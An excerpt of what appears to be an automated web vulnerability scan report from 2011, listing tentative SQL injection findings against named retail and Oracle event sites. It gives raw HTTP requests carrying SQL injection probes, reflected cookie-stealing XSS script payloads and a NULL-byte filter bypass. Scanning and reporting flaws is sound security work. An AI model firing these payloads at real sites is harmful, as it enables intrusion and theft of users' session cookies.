                                       <option value="">All Categories</option>
                                       <option value="13">Apparel</option>
                                       <option value="15">Appliances</option>
                                       <option value="26">Automotive</option>
                                       <option value="27">Baby</option>
                                       <option value="44">Books</option>
                                       <option value="83">Computer</option>
                                       <option value="111">Electronics</option>
                                       <option value="128">Flowers and Gifts</option>
                                       <option value="150">Health and Beauty</option>
                                       <option value="156">Home and Garden</option>
                                       <option value="v1_0_6">Jewelry and Watches</option>
                                       <option value="202">Movies</option>
                                       <option value="205">Music</option>
                                       <option value="214">Office</option>
                                       <option value="253">Pets</option>
                                       <option value="309">Sports and Outdoor</option>
                                       <option value="334">Toys & Games</option>
                                       <option value="372">Video Games</option>
                   </select>

                   <input class="textField" name="query" type="text" size="50" maxLength="256" value="" id="footerSearchField"/>


               </form>
           </div>
       </div>

       <div class="footerLinksAndCopy clearfix">
           <ul class="mainlinks
...[SNIP]...
1.3. http://cache-www.pronto.com/combine.phpd6bdb [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cache-www.pronto.com
Path:   /combine.phpd6bdb

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /combine.phpd6bdb?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: cache-www.pronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Mar 2011 15:29:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93847


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://ww
...[SNIP]...
<a href="http://www.prontostyle.com/?mid=5d0e9db5-12ec981c808-3238">ProntoStyle.com</a></li>
               <li><a href="http://www.prontotech.com/?mid=5d0e9db5-12ec981c808-3238">ProntoTech.com</a></li>
               <li><a href="http://www.prontohome.com/?mid=5d0e9db5-12ec981c808-3238">ProntoHome.com</a></li>
<li><a href="http://www.prontokids.com/?mid=5d0e9db5-12ec981c808-3238">ProntoKids.com</a></li>
               <li><a href="http://www.babypronto.com/?mid=5d0e9db5-12ec981c808-3238">BabyPronto.com</a></li>
           </ul>
           <div class="footerSearchContainer">
               <form action="/searchBox" method="get" id="footerSearchForm">
                   <label for="footerSearchField">Search our site</label>

                   <input type="submit" value="Submit" class="button searchButton" title="Submit Search">
                   <select class="navSelect" name="directedCatId" align="middle">
                                       <option value="">All Categories</option>
                                       <option value="13">Apparel</option>
                                       <option value="15">Appliances</option>
                                       <option value="26">Automotive</option>
                                       <option value="27">Baby</option>
                                       <option value="44">Books</option>
                                       <option value="83">Computer</option>
                                       <option value="111">Electronics</option>
                                       <option value="128">Flowers and Gifts</option>
                                       <option value="150">Health and Beauty</option>
                                       <option value="156">Home and Garden</option>
                                       <option value="v1_0_6">Jewelry and Watches</option>
                                       <option value="202">Movies</option>
                                       <option value="205">Music</option>
                                       <option value="214">Office</option>
                                       <option value="253">Pets</option>
                                       <option value="309">Sports and Outdoor</option>
                                       <option value="334">Toys & Games</option>
                                       <option value="372">Video Games</option>
                   </select>

                   <input class="textField" name="query" type="text" size="50" maxLength="256" value="" id="footerSearchField"/>


               </form>
           </div>
       </div>

       <div class="footerLinksAndCopy clearfix">
           <ul class="mainlinks
...[SNIP]...

Request 2

GET /combine.phpd6bdb?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: cache-www.pronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Mar 2011 15:29:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93857


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://ww
...[SNIP]...
<a href="http://www.prontostyle.com/?mid=-4dcd5534-12ec993b392--6e46">ProntoStyle.com</a></li>
               <li><a href="http://www.prontotech.com/?mid=-4dcd5534-12ec993b392--6e46">ProntoTech.com</a></li>
               <li><a href="http://www.prontohome.com/?mid=-4dcd5534-12ec993b392--6e46">ProntoHome.com</a></li>
<li><a href="http://www.prontokids.com/?mid=-4dcd5534-12ec993b392--6e46">ProntoKids.com</a></li>
               <li><a href="http://www.babypronto.com/?mid=-4dcd5534-12ec993b392--6e46">BabyPronto.com</a></li>
           </ul>
           <div class="footerSearchContainer">
               <form action="/searchBox" method="get" id="footerSearchForm">
                   <label for="footerSearchField">Search our site</label>

                   <input type="submit" value="Submit" class="button searchButton" title="Submit Search">
                   <select class="navSelect" name="directedCatId" align="middle">
                                       <option value="">All Categories</option>
                                       <option value="13">Apparel</option>
                                       <option value="15">Appliances</option>
                                       <option value="26">Automotive</option>
                                       <option value="27">Baby</option>
                                       <option value="44">Books</option>
                                       <option value="83">Computer</option>
                                       <option value="111">Electronics</option>
                                       <option value="128">Flowers and Gifts</option>
                                       <option value="150">Health and Beauty</option>
                                       <option value="156">Home and Garden</option>
                                       <option value="v1_0_6">Jewelry and Watches</option>
                                       <option value="202">Movies</option>
                                       <option value="205">Music</option>
                                       <option value="214">Office</option>
                                       <option value="253">Pets</option>
                                       <option value="309">Sports and Outdoor</option>
                                       <option value="334">Toys & Games</option>
                                       <option value="372">Video Games</option>
                   </select>

                   <input class="textField" name="query" type="text" size="50" maxLength="256" value="" id="footerSearchField"/>


               </form>
           </div>
       </div>

       <div class="footerLinksAndCopy clearfix">
           <ul class=
...[SNIP]...
1.4. http://cache-www.pronto.com/combine.phpd6bdb'>9cb9ce2aee9 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cache-www.pronto.com
Path:   /combine.phpd6bdb'><script>alert(document.cookie)</script>9cb9ce2aee9

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 22467197'%20or%201%3d1--%20 and 22467197'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /combine.phpd6bdb'><script>alert(document.cookie)</script>9cb9ce2aee9?type=javascript&hash=19&files=&122467197'%20or%201%3d1--%20=1 HTTP/1.1
Host: cache-www.pronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Mar 2011 15:29:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 94060


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://ww
...[SNIP]...
<a href="http://www.prontostyle.com/?mid=77855507-12ec9829e42-7a6">ProntoStyle.com</a></li>
               <li><a href="http://www.prontotech.com/?mid=77855507-12ec9829e42-7a6">ProntoTech.com</a></li>
               <li><a href="http://www.prontohome.com/?mid=77855507-12ec9829e42-7a6">ProntoHome.com</a></li>
<li><a href="http://www.prontokids.com/?mid=77855507-12ec9829e42-7a6">ProntoKids.com</a></li>
               <li><a href="http://www.babypronto.com/?mid=77855507-12ec9829e42-7a6">BabyPronto.com</a></li>
           </ul>
           <div class="footerSearchContainer">
               <form action="/searchBox" method="get" id="footerSearchForm">
                   <label for="footerSearchField">Search our site</label>

                   <input type="submit" value="Submit" class="button searchButton" title="Submit Search">
                   <select class="navSelect" name="directedCatId" align="middle">
                                       <option value="">All Categories</option>
                                       <option value="13">Apparel</option>
                                       <option value="15">Appliances</option>
                                       <option value="26">Automotive</option>
                                       <option value="27">Baby</option>
                                       <option value="44">Books</option>
                                       <option value="83">Computer</option>
                                       <option value="111">Electronics</option>
                                       <option value="128">Flowers and Gifts</option>
                                       <option value="150">Health and Beauty</option>
                                       <option value="156">Home and Garden</option>
                                       <option value="v1_0_6">Jewelry and Watches</option>
                                       <option value="202">Movies</option>
                                       <option value="205">Music</option>
                                       <option value="214">Office</option>
                                       <option value="253">Pets</option>
                                       <option value="309">Sports and Outdoor</option>
                                       <option value="334">Toys & Games</option>
                                       <option value="372">Video Games</option>
                   </select>

                   <input class="textField" name="query" type="text" size="50" maxLength="256" value="" id="footerSearchField"/>


               </form>
           </div>
       </div>

       <div class="footerLinksAndCopy clearfix">
           <ul class="mainlinks link
...[SNIP]...

Request 2

GET /combine.phpd6bdb'><script>alert(document.cookie)</script>9cb9ce2aee9?type=javascript&hash=19&files=&122467197'%20or%201%3d2--%20=1 HTTP/1.1
Host: cache-www.pronto.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2.4 (Fedora)
Content-Type: text/html;charset=ISO-8859-1
Date: Fri, 18 Mar 2011 15:29:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 94075


            <!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://ww
...[SNIP]...
<a href="http://www.prontostyle.com/?mid=-3dc5b240-12ec994f0a1--75a2">ProntoStyle.com</a></li>
               <li><a href="http://www.prontotech.com/?mid=-3dc5b240-12ec994f0a1--75a2">ProntoTech.com</a></li>
               <li><a href="http://www.prontohome.com/?mid=-3dc5b240-12ec994f0a1--75a2">ProntoHome.com</a></li>
<li><a href="http://www.prontokids.com/?mid=-3dc5b240-12ec994f0a1--75a2">ProntoKids.com</a></li>
               <li><a href="http://www.babypronto.com/?mid=-3dc5b240-12ec994f0a1--75a2">BabyPronto.com</a></li>
           </ul>
           <div class="footerSearchContainer">
               <form action="/searchBox" method="get" id="footerSearchForm">
                   <label for="footerSearchField">Search our site</label>

                   <input type="submit" value="Submit" class="button searchButton" title="Submit Search">
                   <select class="navSelect" name="directedCatId" align="middle">
                                       <option value="">All Categories</option>
                                       <option value="13">Apparel</option>
                                       <option value="15">Appliances</option>
                                       <option value="26">Automotive</option>
                                       <option value="27">Baby</option>
                                       <option value="44">Books</option>
                                       <option value="83">Computer</option>
                                       <option value="111">Electronics</option>
                                       <option value="128">Flowers and Gifts</option>
                                       <option value="150">Health and Beauty</option>
                                       <option value="156">Home and Garden</option>
                                       <option value="v1_0_6">Jewelry and Watches</option>
                                       <option value="202">Movies</option>
                                       <option value="205">Music</option>
                                       <option value="214">Office</option>
                                       <option value="253">Pets</option>
                                       <option value="309">Sports and Outdoor</option>
                                       <option value="334">Toys & Games</option>
                                       <option value="372">Video Games</option>
                   </select>

                   <input class="textField" name="query" type="text" size="50" maxLength="256" value="" id="footerSearchField"/>


               </form>
           </div>
       </div>

       <div class="footerLinksAndCopy clearfix">
           <ul class=
...[SNIP]...
1.6. http://cache1.wine.com/favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cache1.wine.com
Path:   /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6' HTTP/1.1
Host: cache1.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-SL-CompState: Uncompiled
X-Strangeloop: Compression
Date: Fri, 18 Mar 2011 15:30:10 GMT
Content-Length: 10120
Connection: close
Set-Cookie: ASPSESSIONIDSACATBQR=HJEEHLJBKKHLLOPDMJOJENPA; path=/
Set-Cookie: SL_Audience=208|Accelerated|566|1|0;Expires=Sun, 17-Mar-13 15:30:10 GMT;Path=/;Domain=.wine.com
Set-Cookie: __utmv=139987105.SL_TS_Accelerated;Expires=Sun, 17-Mar-13 15:30:10 GMT;Path=/;Domain=.wine.com
Set-Cookie: SL_UVId=2B34AE848480099B;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Sun, 20-Mar-11 03:30:10 GMT;Path=/;Domain=.wine.com


<html>
<head><script id="slheadjs" type="text/javascript" slHead="/slhead.js?Lo0P=d685fb28d1928bfb05e81f8a7e75d6858383" err="true">__$1D0C = { head: new Date()}</script>
   <title>Wine.com - Buy Win
...[SNIP]...
){if(this.override)return true;return k("err",false,false)}},
e:function(b,c,d,e){e=e!=null&&e.length>0?"("+encodeURIComponent(e)+")":"";this.err.tLog.unshift(c+":"+d+e);if(typeof b=="undefined")throw Error("undefined");else throw b;},listen:function(b,c,d,e){try{if(b.addEventListener)b.addEventListener(c,d,e);else b.attachEvent&&b.attachEvent("on"+c,d)}catch(h){a.e(h,i,"slhead","r","listen")}},pg:{head:
...[SNIP]...

Request 2

GET /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6'' HTTP/1.1
Host: cache1.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Fri, 18 Mar 2011 15:30:10 GMT
Content-Length: 24259
Connection: close
Set-Cookie: SessionGUID=E05142EF%2D8BA2%2D456D%2DA802%2DB14471788F8C; expires=Sat, 17-Mar-2012 15:30:10 GMT; domain=cache1.wine.com; path=/
Set-Cookie: ASPSESSIONIDSACATBQR=LJEEHLJBGODPOHEOCMMOKADA; path=/
Set-Cookie: SL_Audience=401|Accelerated|312|1|0;Expires=Sun, 17-Mar-13 15:30:10 GMT;Path=/;Domain=.wine.com
Set-Cookie: __utmv=139987105.SL_TS_Accelerated;Expires=Sun, 17-Mar-13 15:30:10 GMT;Path=/;Domain=.wine.com


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" type="text/css" href="http://www.wine.com/includes/css/defaultsixC.css" />
<script language="JavaScript" type="t
...[SNIP]...
1.7. http://cache1.wine.com/favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6 [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cache1.wine.com
Path:   /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6 HTTP/1.1
Host: cache1.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-SL-CompState: Uncompiled
X-Strangeloop: Compression
Date: Fri, 18 Mar 2011 15:30:03 GMT
Content-Length: 10120
Connection: close
Set-Cookie: ASPSESSIONIDSACATBQR=GFEEHLJBEONPCFCDBHLNACOH; path=/
Set-Cookie: SL_Audience=405|Accelerated|359|1|0;Expires=Sun, 17-Mar-13 15:30:03 GMT;Path=/;Domain=.wine.com
Set-Cookie: __utmv=139987105.SL_TS_Accelerated;Expires=Sun, 17-Mar-13 15:30:03 GMT;Path=/;Domain=.wine.com
Set-Cookie: SL_UVId=2B34AE80CC47463F;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Sun, 20-Mar-11 03:30:03 GMT;Path=/;Domain=.wine.com


<html>
<head><script id="slheadjs" type="text/javascript" slHead="/slhead.js?Lo0P=d685fb28d1928bfb05e81f8a7e75d6858383" err="true">__$1D0C = { head: new Date()}</script>
   <title>Wine.com - Buy Win
...[SNIP]...
){if(this.override)return true;return k("err",false,false)}},
e:function(b,c,d,e){e=e!=null&&e.length>0?"("+encodeURIComponent(e)+")":"";this.err.tLog.unshift(c+":"+d+e);if(typeof b=="undefined")throw Error("undefined");else throw b;},listen:function(b,c,d,e){try{if(b.addEventListener)b.addEventListener(c,d,e);else b.attachEvent&&b.attachEvent("on"+c,d)}catch(h){a.e(h,i,"slhead","r","listen")}},pg:{head:
...[SNIP]...

Request 2

GET /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6 HTTP/1.1
Host: cache1.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Length: 24257
Content-Type: text/html
Cache-Control: private
Date: Fri, 18 Mar 2011 15:30:03 GMT
Connection: close
Set-Cookie: SessionGUID=0F9DF072%2D33F8%2D4BD5%2DBAEE%2DEBA7BB4C65D8; expires=Sat, 17-Mar-2012 15:30:02 GMT; domain=cache1.wine.com; path=/
Set-Cookie: ASPSESSIONIDSACATBQR=IFEEHLJBJMECHAODNBEAOAGO; path=/
Set-Cookie: SL_Audience=720|Unaccelerated|42|1|0;Expires=Sun, 17-Mar-13 15:30:03 GMT;Path=/;Domain=.wine.com
Set-Cookie: __utmv=139987105.SL_TS_Unaccelerated;Expires=Sun, 17-Mar-13 15:30:03 GMT;Path=/;Domain=.wine.com


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" type="text/css" href="http://www.wine.com/includes/css/defaultsixC.css" />
<script language="JavaScript" type="t
...[SNIP]...
1.8. http://cache1.wine.com/favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cache1.wine.com
Path:   /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6?1'=1 HTTP/1.1
Host: cache1.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-SL-CompState: Uncompiled
X-Strangeloop: Compression
Date: Fri, 18 Mar 2011 15:29:53 GMT
Content-Length: 10120
Connection: close
Set-Cookie: ASPSESSIONIDSACATBQR=HMDEHLJBLMIEGFMAHEOLFLPM; path=/
Set-Cookie: SL_Audience=234|Accelerated|305|1|0;Expires=Sun, 17-Mar-13 15:29:53 GMT;Path=/;Domain=.wine.com
Set-Cookie: __utmv=139987105.SL_TS_Accelerated;Expires=Sun, 17-Mar-13 15:29:53 GMT;Path=/;Domain=.wine.com
Set-Cookie: SL_UVId=2B34AE7B1E382A4F;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Sun, 20-Mar-11 03:29:53 GMT;Path=/;Domain=.wine.com


<html>
<head><script id="slheadjs" type="text/javascript" slHead="/slhead.js?Lo0P=d685fb28d1928bfb05e81f8a7e75d6858383" err="true">__$1D0C = { head: new Date()}</script>
   <title>Wine.com - Buy Win
...[SNIP]...
){if(this.override)return true;return k("err",false,false)}},
e:function(b,c,d,e){e=e!=null&&e.length>0?"("+encodeURIComponent(e)+")":"";this.err.tLog.unshift(c+":"+d+e);if(typeof b=="undefined")throw Error("undefined");else throw b;},listen:function(b,c,d,e){try{if(b.addEventListener)b.addEventListener(c,d,e);else b.attachEvent&&b.attachEvent("on"+c,d)}catch(h){a.e(h,i,"slhead","r","listen")}},pg:{head:
...[SNIP]...

Request 2

GET /favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6?1''=1 HTTP/1.1
Host: cache1.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
X-Strangeloop: Compression
Date: Fri, 18 Mar 2011 15:29:53 GMT
Content-Length: 24262
Connection: close
Set-Cookie: SessionGUID=E5197301%2D0875%2D47ED%2DA16B%2D664BE3D734B9; expires=Sat, 17-Mar-2012 15:29:52 GMT; domain=cache1.wine.com; path=/
Set-Cookie: ASPSESSIONIDSACATBQR=LMDEHLJBHJIKFLMCPOAKBOJL; path=/
Set-Cookie: SL_Audience=179|Accelerated|187|1|0;Expires=Sun, 17-Mar-13 15:29:53 GMT;Path=/;Domain=.wine.com
Set-Cookie: __utmv=139987105.SL_TS_Accelerated;Expires=Sun, 17-Mar-13 15:29:53 GMT;Path=/;Domain=.wine.com


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" type="text/css" href="http://www.wine.com/includes/css/defaultsixC.css" />
<script language="JavaScript" type="t
...[SNIP]...
1.9. http://events.oracle.com/search/search [9f0e2%22-alert(document.cookie)-%2216f8f9c9e8e parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://events.oracle.com
Path:   /search/search

Issue detail

The 9f0e2%22-alert(document.cookie)-%2216f8f9c9e8e parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the 9f0e2%22-alert(document.cookie)-%2216f8f9c9e8e parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /search/search?group=Events&keyword=OPN+Only&9f0e2%22-alert(document.cookie)-%2216f8f9c9e8e=1'%20and%201%3d1--%20 HTTP/1.1
Host: events.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.1 (M;max-age=900+0;age=0;ecid=120492918608,0)
Date: Fri, 18 Mar 2011 15:36:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 177068


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-e
...[SNIP]...
<i>Rio De Janeiro</i> </td>
</tr>
</tbody>
</table></td>
<td width="60">&nbsp;</td>
<td colspan="2" align="left" valign="top" width="100%">
<table border="0" width="400" summary="resultDetail5">
<tbody>
<tr>
<td colspan="5" width="100%" style="padding-bottom: 10px;" align="left">
<strong>
<a onclick="window.open('http://www.oracle.com/go/?&amp;Src=6963067&amp;Act=36&amp;pcode=LADPN10014049MPP040','Headlines_Result','height=480,width=640,resizable=yes,location=yes,scrollbars=yes,status=yes,toolbar=yes,menubar=yes,addressbar=yes');return false;" href="http://www.oracle.com/go/?&amp;Src=6963067&amp;Act=36&amp;pcode=LADPN10014049MPP040"><b>OPN</b> R12.1 Oracle SCM Essentials Implementation Boot Camp Ed 1 (D64622GC10) - Oracle
</a>
</strong>




<div style="padding-top: 7px; font-size: 11px; display: none; padding-right: 10px;" id="table_5"><wbr>

                A Boot Camp ofnOPN R12.1 Oracle SCM Essentials Implementation taking place in Rio de Janeiro. Save the date and join us!
<br><br>In Progress until March 26<br>
    </div>
</td>

</tr>
<tr>

<td style="width: 5em; cursor: pointer; font-weight: bold; color: red; p
...[SNIP]...

Request 2

GET /search/search?group=Events&keyword=OPN+Only&9f0e2%22-alert(document.cookie)-%2216f8f9c9e8e=1'%20and%201%3d2--%20 HTTP/1.1
Host: events.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.1 (M;max-age=900+0;age=1;ecid=309471481082,0)
Date: Fri, 18 Mar 2011 15:36:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 176935


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-e
...[SNIP]...
<i>Sao Paulo</i> </td>
</tr>
</tbody>
</table></td>
<td width="60">&nbsp;</td>
<td colspan="2" align="left" valign="top" width="100%">
<table border="0" width="400" summary="resultDetail5">
<tbody>
<tr>
<td colspan="5" width="100%" style="padding-bottom: 10px;" align="left">
<strong>
<a onclick="window.open('http://www.oracle.com/go/?&amp;Src=6963067&amp;Act=31&amp;pcode=LADPN10014049MPP035','Headlines_Result','height=480,width=640,resizable=yes,location=yes,scrollbars=yes,status=yes,toolbar=yes,menubar=yes,addressbar=yes');return false;" href="http://www.oracle.com/go/?&amp;Src=6963067&amp;Act=31&amp;pcode=LADPN10014049MPP035"><b>OPN</b> Hyperion Planning 11.1.1 Implementation Boot Camp Ed 1 (D64290GC10) - Oracle
</a>
</strong>




<div style="padding-top: 7px; font-size: 11px; display: none; padding-right: 10px;" id="table_5"><wbr>

                A Boot Camp on Hyperion Planning 11.1.1 Implementation for partners in S..o Paulo. Save the date and join us!
<br><br>In Progress until March 18<br>
    </div>
</td>

</tr>
<tr>

<td style="width: 5em; cursor: pointer; font-weight: bold; color: red; padding-top: 15px; p
...[SNIP]...
1.10. http://events.oracle.com/search/search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://events.oracle.com
Path:   /search/search

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /search/search?group=Events&keyword=OPN+Only&9f0e2%22-alert(document.cookie&1%20and%201%3d1--%20=1 HTTP/1.1
Host: events.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.1 (M;max-age=900+0;age=1;ecid=163442632397,0)
Date: Fri, 18 Mar 2011 15:37:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 176920


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-e
...[SNIP]...
<i>Sao Paulo</i> </td>
</tr>
</tbody>
</table></td>
